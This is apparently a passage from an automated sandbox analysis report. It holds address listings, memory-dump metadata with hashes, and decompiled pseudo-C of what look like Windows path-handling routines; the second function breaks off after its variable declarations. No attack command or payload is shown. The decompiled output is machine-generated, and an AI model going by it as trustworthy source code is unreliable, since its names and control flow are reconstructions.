                                      0x03795f70
                                      0x03795f70
                                      0x03795f91
                                      0x03795f9c
                                      0x03795f9e
                                      0x03795fa4
                                      0x03795fa6
                                      0x0379638c
                                      0x03796392
                                      0x037963a1
                                      0x037963a7
                                      0x037963af
                                      0x037963af
                                      0x037963bd
                                      0x037963d8
                                      0x00000000
                                      0x037963d8
                                      0x03795fac
                                      0x03795fb2
                                      0x03795fb4
                                      0x03795fbd
                                      0x03795fc6
                                      0x03795fce
                                      0x03795fd4
                                      0x03795fdc
                                      0x03795fec
                                      0x03795fed
                                      0x03795fee
                                      0x03795fef
                                      0x03795ff9
                                      0x03795ffa
                                      0x03795ffb
                                      0x03795ffc
                                      0x03796000
                                      0x03796004
                                      0x03796012
                                      0x03796012
                                      0x03796018
                                      0x03796019
                                      0x0379601a
                                      0x0379601b
                                      0x0379601c
                                      0x03796020
                                      0x03796059
                                      0x0379605c
                                      0x03796061
                                      0x03796061
                                      0x03796022
                                      0x03796022
                                      0x03796022
                                      0x03796025
                                      0x0379602a
                                      0x0379602b
                                      0x03796031
                                      0x03796037
                                      0x03796038
                                      0x0379603e
                                      0x03796048
                                      0x03796049
                                      0x0379604a
                                      0x0379604b
                                      0x0379604c
                                      0x0379604d
                                      0x03796053
                                      0x03796054
                                      0x03796054
                                      0x03796062
                                      0x03796065
                                      0x03796067
                                      0x0379606a
                                      0x03796070
                                      0x03796075
                                      0x03796076
                                      0x03796081
                                      0x03796087
                                      0x03796095
                                      0x03796099
                                      0x0379609e
                                      0x037960a4
                                      0x037960ae
                                      0x037960b0
                                      0x037960b3
                                      0x037960b6
                                      0x037960b8
                                      0x037960ba
                                      0x037960ba
                                      0x037960ba
                                      0x037960ba
                                      0x037960be
                                      0x037960c0
                                      0x037960c5
                                      0x037960c5
                                      0x037960c5
                                      0x037960c6
                                      0x037960cd
                                      0x03796114
                                      0x037960cf
                                      0x037960cf
                                      0x037960d4
                                      0x037960d5
                                      0x037960da
                                      0x037960db
                                      0x037960e1
                                      0x037960e2
                                      0x037960e8
                                      0x037960f8
                                      0x037960fd
                                      0x037960fe
                                      0x03796102
                                      0x03796104
                                      0x03796107
                                      0x03796109
                                      0x0379610b
                                      0x0379610b
                                      0x0379610b
                                      0x0379610b
                                      0x0379610f
                                      0x0379610f
                                      0x03796117
                                      0x0379611a
                                      0x0379611f
                                      0x03796125
                                      0x03796134
                                      0x03796139
                                      0x0379613f
                                      0x03796146
                                      0x03796148
                                      0x0379614b
                                      0x0379614d
                                      0x0379614f
                                      0x0379614f
                                      0x0379614f
                                      0x0379614f
                                      0x03796153
                                      0x03796159
                                      0x03796159
                                      0x0379615c
                                      0x03796163
                                      0x03796169
                                      0x0379616c
                                      0x03796172
                                      0x03796181
                                      0x03796186
                                      0x03796187
                                      0x0379618b
                                      0x03796191
                                      0x03796195
                                      0x037961a3
                                      0x037961bb
                                      0x037961c0
                                      0x037961c3
                                      0x037961cc
                                      0x037961d0
                                      0x037961dc
                                      0x037961de
                                      0x037961e1
                                      0x037961e4
                                      0x037961e6
                                      0x037961e8
                                      0x037961e8
                                      0x037961e8
                                      0x037961e8
                                      0x037961e6
                                      0x037961ec
                                      0x037961f3
                                      0x03796203
                                      0x03796209
                                      0x0379620a
                                      0x03796216
                                      0x0379621d
                                      0x03796227
                                      0x03796241
                                      0x03796246
                                      0x0379624c
                                      0x03796257
                                      0x03796259
                                      0x0379625c
                                      0x0379625e
                                      0x03796260
                                      0x03796260
                                      0x03796260
                                      0x03796260
                                      0x0379625e
                                      0x03796264
                                      0x03796267
                                      0x03796269
                                      0x03796315
                                      0x03796315
                                      0x0379631b
                                      0x0379631e
                                      0x03796324
                                      0x03796327
                                      0x0379632f
                                      0x03796330
                                      0x03796333
                                      0x0379633a
                                      0x0379633c
                                      0x03796335
                                      0x03796335
                                      0x03796335
                                      0x0379633f
                                      0x03796342
                                      0x0379634c
                                      0x03796352
                                      0x03796355
                                      0x03796355
                                      0x03796359
                                      0x00000000
                                      0x0379626f
                                      0x03796275
                                      0x03796275
                                      0x03796278
                                      0x0379627e
                                      0x0379627e
                                      0x03796281
                                      0x03796287
                                      0x0379628d
                                      0x03796298
                                      0x0379629c
                                      0x037962a2
                                      0x0379629e
                                      0x0379629e
                                      0x0379629e
                                      0x037962a7
                                      0x037962a7
                                      0x037962aa
                                      0x037962b0
                                      0x037962f0
                                      0x037962f0
                                      0x037962f2
                                      0x037962f8
                                      0x037962fd
                                      0x037962b2
                                      0x037962b2
                                      0x037962b2
                                      0x037962b5
                                      0x037962dd
                                      0x037962e2
                                      0x037962e5
                                      0x037962b7
                                      0x037962b8
                                      0x037962bb
                                      0x037962bd
                                      0x037962c0
                                      0x037962c4
                                      0x037962cd
                                      0x037962cd
                                      0x037962c0
                                      0x037962bb
                                      0x037962b5
                                      0x03796302
                                      0x03796303
                                      0x03796305
                                      0x03796305
                                      0x03796305
                                      0x0379630c
                                      0x0379630c
                                      0x00000000
                                      0x0379627e
                                      0x03796269
                                      0x03795eac
                                      0x03795ebb
                                      0x03795ebe
                                      0x03795ecb
                                      0x03795ecb
                                      0x03795ece
                                      0x03795ece
                                      0x03795ed4
                                      0x03795ed7
                                      0x03795ed9
                                      0x03795edb
                                      0x03795edb
                                      0x03795ee1
                                      0x03795ee1
                                      0x03795ee3
                                      0x03795f20
                                      0x03795f20
                                      0x03795ee5
                                      0x03795ee5
                                      0x03795ee5
                                      0x03795ee8
                                      0x03795f11
                                      0x03795f18
                                      0x03795eea
                                      0x03795eea
                                      0x03795eed
                                      0x03795ef2
                                      0x03795ef8
                                      0x03795efb
                                      0x03795f0a
                                      0x03795f0a
                                      0x03795eed
                                      0x03795ee8
                                      0x03795f22
                                      0x03795f28
                                      0x00000000
                                      0x00000000
                                      0x03795f30
                                      0x03795f31
                                      0x03795f37
                                      0x03795f3a
                                      0x03795f3d
                                      0x03795f44
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03795f46
                                      0x03795f48
                                      0x03795f4d
                                      0x00000000
                                      0x03795f4d
                                      0x03795dda
                                      0x03795ddf
                                      0x00000000
                                      0x03795ddf
                                      0x03795dd8
                                      0x03795da7
                                      0x03795da9
                                      0x03795dac
                                      0x03795dae
                                      0x00000000
                                      0x03795db4
                                      0x03795db4
                                      0x00000000
                                      0x03795db4
                                      0x03795dae
                                      0x03795d88
                                      0x03795d8d
                                      0x03796363
                                      0x03796369
                                      0x0379636a
                                      0x03796370
                                      0x03796372
                                      0x0379637a
                                      0x0379637b
                                      0x0379637d
                                      0x00000000
                                      0x00000000
                                      0x0379637f
                                      0x03796385
                                      0x00000000
                                      0x03796385
                                      0x03795d38
                                      0x03795d3b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03795d3b
                                      0x03795d27
                                      0x03795d29
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03796360
                                      0x00000000
                                      0x03796360
                                      0x03795c10
                                      0x03795c10
                                      0x037963da
                                      0x037963e5
                                      0x037963e5

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 442cd02e4c174d59be3b7d4d62eee89626ed309f7c28c8c014c9e84beafaad4c
                                      • Instruction ID: 1d361e44692fe59e81226a561e0ce731bb8406df78a4c4737962b5c80911f156
                                      • Opcode Fuzzy Hash: 442cd02e4c174d59be3b7d4d62eee89626ed309f7c28c8c014c9e84beafaad4c
                                      • Instruction Fuzzy Hash: 7B425B75900229CFEF24CF68D880BA9F7B1FF49314F1982AAD94DAB242D7749985CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036E4120, Relevance: .4, Instructions: 444COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E036E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x37bd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E036FF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E036E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L036E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E036E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M036E45F8))) {
												case 0:
													_v568 = 0x36a1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x36a11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L036E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0370F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0370F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E036C52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E036DEB70(1, 0x37b79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E036DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E037095D0();
																			L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0370B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03703D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0370B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                      0x036e4128
                                      0x036e4135
                                      0x036e413c
                                      0x036e4141
                                      0x036e4145
                                      0x036e4147
                                      0x036e414e
                                      0x036e4151
                                      0x036e4159
                                      0x036e415c
                                      0x036e4160
                                      0x036e4164
                                      0x036e4168
                                      0x036e416c
                                      0x036e417f
                                      0x036e4181
                                      0x036e446a
                                      0x036e446a
                                      0x036e418c
                                      0x036e4195
                                      0x036e4199
                                      0x036e4432
                                      0x036e4439
                                      0x036e443d
                                      0x036e4442
                                      0x036e4447
                                      0x00000000
                                      0x036e419f
                                      0x036e41a3
                                      0x036e41b1
                                      0x036e41b9
                                      0x036e41bd
                                      0x036e45db
                                      0x036e45db
                                      0x00000000
                                      0x036e41c3
                                      0x036e41c3
                                      0x036e41ce
                                      0x036e41d4
                                      0x0372e138
                                      0x0372e13e
                                      0x0372e169
                                      0x0372e16d
                                      0x0372e19e
                                      0x0372e16f
                                      0x0372e16f
                                      0x0372e175
                                      0x0372e179
                                      0x0372e18f
                                      0x0372e193
                                      0x00000000
                                      0x0372e199
                                      0x00000000
                                      0x0372e199
                                      0x0372e193
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036e41da
                                      0x036e41da
                                      0x036e41df
                                      0x036e41e4
                                      0x036e41ec
                                      0x036e4203
                                      0x036e4207
                                      0x0372e1fd
                                      0x036e4222
                                      0x036e4226
                                      0x0372e1f3
                                      0x0372e1f3
                                      0x036e422c
                                      0x036e422c
                                      0x036e4233
                                      0x0372e1ed
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036e4239
                                      0x036e4239
                                      0x036e4239
                                      0x036e4239
                                      0x036e4233
                                      0x036e4226
                                      0x036e41ee
                                      0x036e41ee
                                      0x036e41f4
                                      0x036e4575
                                      0x0372e1b1
                                      0x0372e1b1
                                      0x00000000
                                      0x036e457b
                                      0x036e457b
                                      0x036e4582
                                      0x0372e1ab
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036e4588
                                      0x036e4588
                                      0x036e458c
                                      0x0372e1c4
                                      0x0372e1c4
                                      0x00000000
                                      0x036e4592
                                      0x036e4592
                                      0x036e4599
                                      0x0372e1be
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036e459f
                                      0x036e459f
                                      0x036e45a3
                                      0x0372e1d7
                                      0x0372e1e4
                                      0x00000000
                                      0x036e45a9
                                      0x036e45a9
                                      0x036e45b0
                                      0x0372e1d1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036e45b6
                                      0x036e45b6
                                      0x036e45b6
                                      0x00000000
                                      0x036e45b6
                                      0x036e45b0
                                      0x036e45a3
                                      0x036e4599
                                      0x036e458c
                                      0x036e4582
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036e41f4
                                      0x036e423e
                                      0x036e4241
                                      0x036e45c0
                                      0x036e45c4
                                      0x00000000
                                      0x036e45ca
                                      0x036e45ca
                                      0x00000000
                                      0x0372e207
                                      0x0372e20f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036e45d1
                                      0x00000000
                                      0x00000000
                                      0x036e45ca
                                      0x00000000
                                      0x036e4247
                                      0x036e4247
                                      0x036e4247
                                      0x036e4249
                                      0x036e4249
                                      0x036e4249
                                      0x036e4251
                                      0x036e4251
                                      0x036e4257
                                      0x036e425f
                                      0x036e426e
                                      0x036e4270
                                      0x036e427a
                                      0x0372e219
                                      0x0372e219
                                      0x036e4280
                                      0x036e4282
                                      0x036e4456
                                      0x036e45ea
                                      0x00000000
                                      0x036e45f0
                                      0x0372e223
                                      0x00000000
                                      0x0372e223
                                      0x036e445c
                                      0x036e445c
                                      0x00000000
                                      0x036e445c
                                      0x00000000
                                      0x036e4288
                                      0x036e428c
                                      0x0372e298
                                      0x036e4292
                                      0x036e4292
                                      0x036e429e
                                      0x036e42a3
                                      0x036e42a7
                                      0x036e42ac
                                      0x0372e22d
                                      0x036e42b2
                                      0x036e42b2
                                      0x036e42b9
                                      0x036e42bc
                                      0x036e42c2
                                      0x036e42ca
                                      0x036e42cd
                                      0x036e42cd
                                      0x036e42d4
                                      0x036e433f
                                      0x036e433f
                                      0x036e42d6
                                      0x036e42d6
                                      0x036e42d9
                                      0x036e42dd
                                      0x036e42eb
                                      0x0372e23a
                                      0x036e42f1
                                      0x036e4305
                                      0x036e430d
                                      0x036e4315
                                      0x036e4318
                                      0x036e431f
                                      0x036e4322
                                      0x036e432e
                                      0x036e433b
                                      0x036e433b
                                      0x00000000
                                      0x036e432e
                                      0x036e42eb
                                      0x036e434c
                                      0x036e434e
                                      0x036e4352
                                      0x036e4359
                                      0x036e435e
                                      0x036e4361
                                      0x036e436e
                                      0x036e438a
                                      0x036e438e
                                      0x036e4396
                                      0x036e439e
                                      0x036e43a1
                                      0x036e43ad
                                      0x036e43bb
                                      0x036e43bb
                                      0x036e43ad
                                      0x036e436e
                                      0x036e43bf
                                      0x036e43c5
                                      0x036e4463
                                      0x036e4463
                                      0x036e43ce
                                      0x036e43d5
                                      0x036e43d9
                                      0x036e43df
                                      0x036e4475
                                      0x036e4479
                                      0x036e4491
                                      0x036e4491
                                      0x036e4479
                                      0x036e43e5
                                      0x036e43eb
                                      0x036e43f4
                                      0x036e43f6
                                      0x036e43f9
                                      0x036e43fc
                                      0x036e43ff
                                      0x036e44e8
                                      0x036e44ed
                                      0x036e44f3
                                      0x0372e247
                                      0x00000000
                                      0x036e44f9
                                      0x036e4504
                                      0x036e4508
                                      0x036e450f
                                      0x0372e269
                                      0x00000000
                                      0x036e4515
                                      0x036e4519
                                      0x036e4531
                                      0x036e4534
                                      0x036e4537
                                      0x036e453e
                                      0x036e4541
                                      0x036e454a
                                      0x0372e255
                                      0x0372e255
                                      0x0372e25b
                                      0x0372e25e
                                      0x0372e261
                                      0x0372e261
                                      0x036e4555
                                      0x036e4559
                                      0x036e455d
                                      0x0372e26d
                                      0x0372e270
                                      0x0372e274
                                      0x0372e27a
                                      0x0372e27d
                                      0x0372e28e
                                      0x0372e28e
                                      0x036e4563
                                      0x036e4563
                                      0x036e4569
                                      0x036e4569
                                      0x00000000
                                      0x036e455d
                                      0x036e450f
                                      0x00000000
                                      0x036e44f3
                                      0x036e43ff
                                      0x036e4405
                                      0x036e4405
                                      0x036e4405
                                      0x036e42ac
                                      0x036e428c
                                      0x036e4282
                                      0x036e4407
                                      0x036e440d
                                      0x0372e2af
                                      0x0372e2af
                                      0x036e4413
                                      0x036e4413
                                      0x00000000
                                      0x036e41d4
                                      0x00000000
                                      0x036e41c3
                                      0x036e41bd
                                      0x036e4415
                                      0x036e4415
                                      0x036e4416
                                      0x036e4417
                                      0x036e4429
                                      0x036e416e
                                      0x036e416e
                                      0x036e4175
                                      0x036e4498
                                      0x036e449f
                                      0x0372e12d
                                      0x00000000
                                      0x0372e133
                                      0x00000000
                                      0x0372e133
                                      0x036e44a5
                                      0x036e44a5
                                      0x036e44aa
                                      0x00000000
                                      0x036e44bb
                                      0x036e44ca
                                      0x036e44d6
                                      0x036e44d7
                                      0x036e44d8
                                      0x036e44e3
                                      0x036e44e3
                                      0x036e44aa
                                      0x036e417b
                                      0x036e417b
                                      0x036e417b
                                      0x00000000
                                      0x036e417b
                                      0x036e4175
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5005c7467a9c3341e53b8c86943ed99bef30b6892dafd001ab5b7cec13ce3201
                                      • Instruction ID: 214171b3cfaeade0dfa500550a662b9db099de800ebf653380524690ad3d704f
                                      • Opcode Fuzzy Hash: 5005c7467a9c3341e53b8c86943ed99bef30b6892dafd001ab5b7cec13ce3201
                                      • Instruction Fuzzy Hash: A4F17C756093118FC725CF2AC484A3AB7E1EF88704F58496EF496CB790EB34D989CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F20A0, Relevance: .4, Instructions: 420COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E036F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x37b8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
